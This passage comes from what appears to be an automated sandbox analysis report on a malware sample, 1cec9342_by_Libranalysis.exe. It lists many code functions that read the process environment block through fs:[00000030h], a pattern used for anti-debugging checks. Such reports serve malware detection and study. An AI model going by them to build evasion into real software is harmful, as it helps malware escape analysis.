          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]1_2_00A93884
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A158EC mov eax, dword ptr fs:[00000030h]1_2_00A158EC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AAB8D0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]1_2_00A2B02A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]1_2_00A2B02A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]1_2_00A2B02A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2B02A mov eax, dword ptr fs:[00000030h]1_2_00A2B02A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]1_2_00A4002D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]1_2_00A4002D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]1_2_00A4002D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]1_2_00A4002D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4002D mov eax, dword ptr fs:[00000030h]1_2_00A4002D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]1_2_00AE4015
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE4015 mov eax, dword ptr fs:[00000030h]1_2_00AE4015
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]1_2_00A97016
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]1_2_00A97016
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97016 mov eax, dword ptr fs:[00000030h]1_2_00A97016
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE1074 mov eax, dword ptr fs:[00000030h]1_2_00AE1074
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD2073 mov eax, dword ptr fs:[00000030h]1_2_00AD2073
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]1_2_00A30050
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A30050 mov eax, dword ptr fs:[00000030h]1_2_00A30050
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]1_2_00A461A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A461A0 mov eax, dword ptr fs:[00000030h]1_2_00A461A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A969A6 mov eax, dword ptr fs:[00000030h]1_2_00A969A6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]1_2_00A951BE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]1_2_00A951BE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]1_2_00A951BE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A951BE mov eax, dword ptr fs:[00000030h]1_2_00A951BE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A185 mov eax, dword ptr fs:[00000030h]1_2_00A4A185
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3C182 mov eax, dword ptr fs:[00000030h]1_2_00A3C182
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42990 mov eax, dword ptr fs:[00000030h]1_2_00A42990
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A1B1E1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A1B1E1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A1B1E1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AA41E8 mov eax, dword ptr fs:[00000030h]1_2_00AA41E8
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov eax, dword ptr fs:[00000030h]1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A34120 mov ecx, dword ptr fs:[00000030h]1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]1_2_00A4513A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4513A mov eax, dword ptr fs:[00000030h]1_2_00A4513A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]1_2_00A19100
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]1_2_00A19100
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19100 mov eax, dword ptr fs:[00000030h]1_2_00A19100
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C962 mov eax, dword ptr fs:[00000030h]1_2_00A1C962
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]1_2_00A1B171
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1B171 mov eax, dword ptr fs:[00000030h]1_2_00A1B171
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]1_2_00A3B944
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3B944 mov eax, dword ptr fs:[00000030h]1_2_00A3B944
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]1_2_00A152A5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]1_2_00A152A5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]1_2_00A152A5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]1_2_00A152A5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A152A5 mov eax, dword ptr fs:[00000030h]1_2_00A152A5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A2AAB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A2AAB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A4FAB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]1_2_00A4D294
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4D294 mov eax, dword ptr fs:[00000030h]1_2_00A4D294
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42AE4 mov eax, dword ptr fs:[00000030h]1_2_00A42AE4
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42ACB mov eax, dword ptr fs:[00000030h]1_2_00A42ACB
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]1_2_00A54A2C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A54A2C mov eax, dword ptr fs:[00000030h]1_2_00A54A2C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A28A0A mov eax, dword ptr fs:[00000030h]1_2_00A28A0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]1_2_00A15210
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov ecx, dword ptr fs:[00000030h]1_2_00A15210
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]1_2_00A15210
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A15210 mov eax, dword ptr fs:[00000030h]1_2_00A15210
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]1_2_00A1AA16
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AA16 mov eax, dword ptr fs:[00000030h]1_2_00A1AA16
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A33A1C mov eax, dword ptr fs:[00000030h]1_2_00A33A1C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]1_2_00ACB260
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACB260 mov eax, dword ptr fs:[00000030h]1_2_00ACB260
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8A62 mov eax, dword ptr fs:[00000030h]1_2_00AE8A62
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5927A mov eax, dword ptr fs:[00000030h]1_2_00A5927A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19240 mov eax, dword ptr fs:[00000030h]1_2_00A19240
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADEA55 mov eax, dword ptr fs:[00000030h]1_2_00ADEA55
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AA4257 mov eax, dword ptr fs:[00000030h]1_2_00AA4257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]1_2_00A44BAD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]1_2_00A44BAD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A44BAD mov eax, dword ptr fs:[00000030h]1_2_00A44BAD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE5BA5 mov eax, dword ptr fs:[00000030h]1_2_00AE5BA5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD138A mov eax, dword ptr fs:[00000030h]1_2_00AD138A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACD380 mov ecx, dword ptr fs:[00000030h]1_2_00ACD380
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]1_2_00A21B8F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A21B8F mov eax, dword ptr fs:[00000030h]1_2_00A21B8F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42397 mov eax, dword ptr fs:[00000030h]1_2_00A42397
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4B390 mov eax, dword ptr fs:[00000030h]1_2_00A4B390
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A403E2 mov eax, dword ptr fs:[00000030h]1_2_00A403E2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A3DBE9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]1_2_00A953CA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A953CA mov eax, dword ptr fs:[00000030h]1_2_00A953CA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD131B mov eax, dword ptr fs:[00000030h]1_2_00AD131B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A1DB60
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]1_2_00A43B7A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A43B7A mov eax, dword ptr fs:[00000030h]1_2_00A43B7A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1DB40 mov eax, dword ptr fs:[00000030h]1_2_00A1DB40
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8B58 mov eax, dword ptr fs:[00000030h]1_2_00AE8B58
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1F358 mov eax, dword ptr fs:[00000030h]1_2_00A1F358
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2849B mov eax, dword ptr fs:[00000030h]1_2_00A2849B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD14FB mov eax, dword ptr fs:[00000030h]1_2_00AD14FB
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]1_2_00A96CF0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]1_2_00A96CF0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96CF0 mov eax, dword ptr fs:[00000030h]1_2_00A96CF0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AE8CD6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4BC2C mov eax, dword ptr fs:[00000030h]1_2_00A4BC2C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]1_2_00AE740D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]1_2_00AE740D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE740D mov eax, dword ptr fs:[00000030h]1_2_00AE740D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96C0A mov eax, dword ptr fs:[00000030h]1_2_00A96C0A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1C06 mov eax, dword ptr fs:[00000030h]1_2_00AD1C06
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3746D mov eax, dword ptr fs:[00000030h]1_2_00A3746D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A44B mov eax, dword ptr fs:[00000030h]1_2_00A4A44B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]1_2_00AAC450
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAC450 mov eax, dword ptr fs:[00000030h]1_2_00AAC450
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]1_2_00AE05AC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE05AC mov eax, dword ptr fs:[00000030h]1_2_00AE05AC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A435A1 mov eax, dword ptr fs:[00000030h]1_2_00A435A1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]1_2_00A41DB5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]1_2_00A41DB5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A41DB5 mov eax, dword ptr fs:[00000030h]1_2_00A41DB5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A42581 mov eax, dword ptr fs:[00000030h]1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A12D8A mov eax, dword ptr fs:[00000030h]1_2_00A12D8A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]1_2_00A4FD9B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4FD9B mov eax, dword ptr fs:[00000030h]1_2_00A4FD9B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A2D5E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A2D5E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADFDE2 mov eax, dword ptr fs:[00000030h]1_2_00ADFDE2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AC8DF1 mov eax, dword ptr fs:[00000030h]1_2_00AC8DF1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A96DC9 mov eax, dword ptr fs:[00000030h]1_2_00A96DC9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1AD30 mov eax, dword ptr fs:[00000030h]1_2_00A1AD30
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADE539 mov eax, dword ptr fs:[00000030h]1_2_00ADE539
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A23D34 mov eax, dword ptr fs:[00000030h]1_2_00A23D34
